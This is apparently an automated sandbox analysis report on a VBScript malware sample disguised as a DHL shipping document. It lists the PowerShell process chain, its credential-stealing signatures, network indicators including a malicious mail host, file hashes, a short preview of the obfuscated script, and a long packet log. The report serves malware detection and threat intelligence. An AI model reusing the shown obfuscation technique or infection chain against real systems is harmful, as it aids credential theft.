            Process chain: wscript.exe started powershell.exe; that powershell.exe started a second powershell.exe, conhost.exe and cmd.exe; the second powershell.exe started wab.exe and cmd.exe
            wscript.exe signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
            powershell.exe (first) signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
            powershell.exe (first) network: drive.usercontent.google.com 142.251.2.132, 443, 49731, 49739 GOOGLEUS United States; drive.google.com 142.251.2.139, 443, 49730, 49738 GOOGLEUS United States
            powershell.exe (second) signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
            wab.exe signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
            wab.exe network: mail.cash4cars.nz 114.142.162.17, 26, 49741 SERVERMULE-AS-APNimbus2PtyLtdAU Australia; api.ipify.org 104.26.13.205, 443, 49740 CLOUDFLARENETUS United States

            Source | Detection | Scanner | Label | Link
            DHL Shipping doc.vbs | 8% | ReversingLabs | Script-WScript.Trojan.Heuristic |
            DHL Shipping doc.vbs | 15% | Virustotal | | Browse

            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            mail.cash4cars.nz | 2% | Virustotal | | Browse

            Source | Detection | Scanner | Label | Link
            http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
            https://go.micro | 0% | URL Reputation | safe |
            https://contoso.com/License | 0% | URL Reputation | safe |
            https://contoso.com/Icon | 0% | URL Reputation | safe |
            http://crl.micro | 0% | URL Reputation | safe |
            http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
            http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |
            https://contoso.com/ | 0% | URL Reputation | safe |
            http://r3.o.lencr.org0 | 0% | URL Reputation | safe |
            https://drive.googP | 0% | Avira URL Cloud | safe |
            https://drive.usercontent.googh | 0% | Avira URL Cloud | safe |
            http://crl.mUy | 0% | Avira URL Cloud | safe |
            http://r3.i.lencr.org/0R | 0% | Avira URL Cloud | safe |
            http://mail.cash4cars.nz | 0% | Avira URL Cloud | safe |
            http://r3.i.lencr.org/0R | 0% | Virustotal | | Browse
            http://mail.cash4cars.nz | 2% | Virustotal | | Browse

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.cash4cars.nz | 114.142.162.17 | true | true | | unknown
drive.google.com | 142.251.2.139 | true | false | | high
drive.usercontent.google.com | 142.251.2.132 | true | false | | high
api.ipify.org | 104.26.13.205 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
114.142.162.17 | mail.cash4cars.nz | Australia | | 133525 | SERVERMULE-AS-APNimbus2PtyLtdAU | true
142.251.2.139 | drive.google.com | United States | | 15169 | GOOGLEUS | false
104.26.13.205 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false
142.251.2.132 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false

Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430756
Start date and time: 2024-04-24 06:48:02 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DHL Shipping doc.vbs
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winVBS@12/7@5/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 90
• Number of non-executed functions: 16
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .vbs
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 5932 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 6692 because it is empty
                                                      • Execution Graph export aborted for target wab.exe, PID 2668 because it is empty
                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

Time | Type | Description
06:48:50 | API Interceptor | 24516x Sleep call for process: powershell.exe modified
06:49:39 | API Interceptor | 39x Sleep call for process: wab.exe modified

                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):11608
                                                      Entropy (8bit):4.886255615007755
                                                      Encrypted:false
                                                      SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                      MD5:C7F7A26360E678A83AFAB85054B538EA
                                                      SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                      SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                      SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllultnxj:NllU
                                                      MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                      SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                      SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                      SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:@...e................................................@..........
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):445624
                                                      Entropy (8bit):5.9619035408855785
                                                      Encrypted:false
                                                      SSDEEP:6144:DJFMovgaoi+8UkY21eOVPX4oP1TYnEfPb2NxPPWdZgRjRNnYb5E7WuxhsXQiRlfe:D1oaB+Svf1TR8aPb2NpQ+7WbQwJ8
                                                      MD5:18A60C1DA6907146EEA018203ACF5089
                                                      SHA1:01C5E653DBA0EDA7CABA355FEFFA97726515247C
                                                      SHA-256:1F5670E65D8367057D1CDC75DE0CA4B194CEF53AEE9311997B1D995ECF242B04
                                                      SHA-512:0EECA59FAC3845807F2DD8D921F15808187F37FB945B51B568120036A46EAEA7A076EEAB0785E95D05B6E972D80E326A7BAFF5E87E68BBA4621197D4E8670644
                                                      Malicious:false
                                                      File type:ASCII text, with very long lines (352), with CRLF line terminators
                                                      Entropy (8bit):5.352663701232987
                                                      TrID:
                                                      • Visual Basic Script (13500/0) 100.00%
                                                      File name:DHL Shipping doc.vbs
                                                      File size:8'414 bytes
                                                      MD5:e483b9251c12c243495cc209ff1fa8e1
                                                      SHA1:3b1d7bdc1563c60ea44c9dd410018879fa1e392e
                                                      SHA256:ab7caea9be94fcd8bf2b3bb9a1da2fbc4af30134a190718ffd81cdb4cc9a3641
                                                      SHA512:c9d89fd7ddbe2ceaff82228c26a86c399fa1b4553398ac9ce4ec0dc4be80cb79ec90e6f4f8f0f6f2c72bc9e6cd8adc7335d2d19ae6200c6342879c01a31c7139
                                                      SSDEEP:192:UmydX+3iccHl8m3OtcUm+6/TAizc7OfG4:KuIl8m+GUcASfG4
                                                      TLSH:DD023B84C5121E854BD37EA22F15A612C818CD17DB3CCDE97913F19E3E83E9D326642E
                                                      File Content Preview:.. ..Function mntindkast ......B8 = B8 & "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effe
                                                      Icon Hash:68d69b8f86ab9a86
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Apr 24, 2024 06:48:55.321310997 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.321391106 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.321398020 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.325771093 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.325839043 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.325848103 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.330357075 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.330424070 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.330432892 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.334328890 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.334438086 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.334449053 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.338377953 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.338445902 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.338454962 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.342677116 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.342740059 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.342751980 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.346782923 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.346971989 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.346987009 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.352837086 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.352905035 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.352917910 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.352948904 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.352993965 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.357319117 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.361239910 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.361304998 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.361327887 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.365272999 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.365345955 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.365355015 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.365384102 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.365431070 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.369292974 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.373162985 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.373203993 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.373224020 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.373233080 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.373275042 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.377044916 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.381108999 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.381266117 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.381294012 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.384968996 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.385049105 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.385145903 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.385155916 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.385215044 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.388703108 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.392752886 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.392865896 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.392894983 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.392906904 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.392951012 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.396418095 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.400177956 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.400242090 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.400254011 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.402118921 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.402184010 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.402194023 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.405817986 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.405936956 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.405947924 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.409485102 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.409548998 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.409559011 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.413248062 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.413300991 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.413307905 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.416857958 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.416924953 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.416933060 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.420780897 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.420844078 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.420852900 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.424005985 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.424068928 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.424077034 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.427568913 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.427773952 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.427782059 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.431097984 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.431174994 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.431183100 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.434611082 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.434699059 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.434705019 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.438226938 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.438342094 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.438349009 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.442073107 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.442135096 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.442146063 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.446624994 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.446701050 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.446707964 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.449922085 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.449989080 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.449995995 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.453183889 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.453247070 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.453253984 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.456620932 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.456696033 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.456698895 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.456722975 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.456758022 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.459901094 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.463304043 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.463382006 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.463392019 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.466432095 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.466510057 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.466521025 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.469572067 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.469640017 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.469650030 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.472780943 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.472845078 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.472852945 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.476005077 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.476069927 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.476078987 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.479002953 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.479074955 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.479083061 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.482135057 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.482187033 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.482194901 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.485239983 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.485297918 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.485306025 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.487019062 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.487134933 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.487165928 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.490005970 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.490072966 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.490091085 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.493201017 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.493280888 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.493297100 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.495918989 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.496042013 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.496062040 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.498672962 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.498747110 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.498776913 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.501384020 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.501449108 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.501463890 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.503956079 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.504019976 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.504029989 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.506613970 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.506680012 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.506695986 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.509186029 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.509238005 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.509247065 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.511692047 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.511744976 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.511753082 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.514365911 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.514427900 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.514437914 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.519315004 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.519390106 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.519443035 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.519455910 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.519498110 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.521806955 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.524210930 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.524260998 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.524271011 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.526772976 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.526839018 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.526846886 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.529225111 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.529279947 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.529289007 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.531472921 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.531522036 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.531529903 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.533883095 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.533941031 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.533948898 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.536070108 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.536133051 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.536140919 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.538439989 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.538499117 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.538508892 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.540637970 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.540704012 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.540714025 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.542998075 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.543061972 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.543071032 CEST44349731142.251.2.132192.168.2.4
